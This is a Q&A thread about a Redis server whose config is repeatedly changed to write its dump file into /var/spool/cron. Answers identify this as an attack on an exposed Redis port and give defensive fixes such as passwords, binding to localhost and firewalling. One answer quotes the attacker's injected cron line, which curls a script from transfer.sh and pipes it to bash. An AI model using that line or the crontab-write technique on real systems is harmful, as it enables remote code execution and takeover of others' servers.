Redis config dir periodically modified to "/var/spool/cron" with "Failed opening .rdb for saving: Permission denied" error

Asked 27/1, 2017 at 5:8 Answered 25/9, 2019 at 6:41

redis cron permission-denied redis-server

I have set up my redis-server so that CONFIG GET dir --> "/var/lib/redis" and CONFIG GET dbfilename --> "redis.rdb".

However, after my server has been running a few hours or a few days, I start getting the "Failed opening .rdb for saving: Permission denied" error.

If I again do CONFIG GET dir --> "/var/spool/cron" and CONFIG GET dbfilename --> "root". I have tried looking all over the place for some kind of understanding of what is happening, but without avail.

If I simply restart my redis-server, then the config is once again reset to the original settings that I set up in the "redis.conf" file.

Disassemble answered 27/1, 2017 at 5:8 Comment(3)

Sounds like someone is trying to attack your server. Put a password at the very least. – Naturalist 27/1, 2017 at 12:17

@ItamarHaber reckon that you could be right. – Disassemble 1/2, 2017 at 10:27

Sorry, you should consider burning the server and starting from fresh – Naturalist 1/2, 2017 at 10:43

This is indeed an attack. If you check your redis keys after this happens you will see few "string" keys like this: "Backup1", "Backup2", "Backup3".

The value of these will be something like this:

"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"

This is meant to modify your crontab.

Bottom line is - don't have redis port opened to the world.

Rexferd answered 13/6, 2018 at 18:16 Comment(3)

Just fell victim to this attack as well. Turns out I had DMZ on my router set to my machine's IP... Thanks! – Panthia 16/6, 2018 at 0:32

I get exactly this only a few hours after rolling a new instance, and forgot to set firewall first! The redis server is inside an docker container. What should I do other than trying to recreate the instance all over again? – Huertas 21/8, 2020 at 10:23

Just got hacked also! I changed security groups and spun-up container again after deleting volumes and settings passwords. What else should I do? Could the attacker have gained access to the entire server? – Weintraub 21/10, 2023 at 6:4

It seems as this may just be a security issue. Out of the box redis is accessible via any IP addresses. As a simple first step to check that this was a security issue as suggested by @ItamarHaber, I simply bound the redis server to localhost and now the problem seems to have resolved itself. Here is a great article that helped me with this.A few things about Redis security

Disassemble answered 1/2, 2017 at 10:32 Comment(0)

this can be solved by restart VM, enable UFW firewall, allow those ip address which are autherised to access.

Titos answered 25/9, 2019 at 6:41 Comment(0)

Recommended topics

Hot tags